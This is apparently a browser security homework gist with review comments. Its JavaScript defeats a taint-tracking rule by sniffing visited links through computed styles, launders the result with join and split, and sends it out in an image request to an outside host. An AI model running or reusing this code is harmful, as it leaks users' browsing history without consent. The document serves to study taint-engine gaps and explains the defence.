@chinmaygarde
Created November 15, 2011 09:08
Browser Security Homework 3. Bypassing TSET.
// The rule is:
/*
* at $1:getCompStyle($2; ...) if $2:isLink() inject "secret"
* at document:send($1; $2) block "secret" on $2
*/
// Reading of the two rules as quoted above: the first labels ("secret") any
// computed-style value read from a link element; the second is meant to stop
// data carrying that label from leaving the page in a network send. The
// script below shows where the label is lost in between, so the second rule
// never gets a chance to fire.
//
// k: a table of obfuscated domain names. Each character is stored with its
// code one higher than the real one and is shifted back down in the loop.
// NOTE(review): as written this literal is not valid JavaScript -- the second
// entry has no key and "..." stands in for the rest of the list.
var k = { 0: "qpsoivc/dpn", "sfeuvcf/dpn", ... };
// g collects the keys of k (not the decoded names) whose link matched the
// colour tested below.
var g = [];
for(var m in k) {
var d = k[m];
var a = "";
// Decode the entry: shift every character code down by one.
for(var f = 0; f < d.length; f++) {
a += String.fromCharCode(d.charCodeAt(f)-1)
}
var h = false;
// Try both the bare and the "www." form of the URL.
for(var j in {"http://":"","http://www.":""}) {
var l = document.createElement("a");
l.href = j + a;
// Assumes the page already contains an element with id "ol"; the same
// container receives the image at the end of the script.
document.getElementById("ol").appendChild(l);
var e = "";
// Rule 1 applies here: the colour read from a link element is tainted.
e = document.defaultView.getComputedStyle(l, null).getPropertyValue("color") // Tainted
// Presumably the page's :visited style sets this colour -- confirm against
// the stylesheet. Both spacings are checked because engines differ in how
// they serialise rgb().
if(e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true } // Tainted
}
if(h) { g.push(m) } // Tainted
}
// g is tainted. My goal is to create an untainted array which is a copy of g
// The laundering step: the engine described does not cover Array.prototype.join,
// so its result carries no label, and split() turns the clean string back into
// an array. A complete engine would have to propagate the label through both
// string operations (and through every other built-in that copies data).
var str = g.join(","); // Because of the incompleteness of the engine described, str will be untainted
var untainted_array = str.split(","); // Voila, we have an untainted array which is a copy of g
var b = (untainted_array instanceof Array)? untainted_array.join(",") : ""; // Untainted, same as original
// The remaining lines are the send that rule 2 was meant to block: the list of
// matched keys leaves the page as a query parameter on an image request, and
// because b no longer carries the label the block rule does not apply.
// Defence note: the signal itself depends on getComputedStyle exposing :visited
// styling; browsers that report visited links with their unvisited style (as
// current ones do) remove it at the source, independent of the taint engine.
var c = document.createElement("img"); // Untainted, same as original
c.src= "http://ol.youporn.com/blank.gif?id="+b; // Untainted, same as original
document.getElementById("ol").appendChild(c); // Untainted, same as original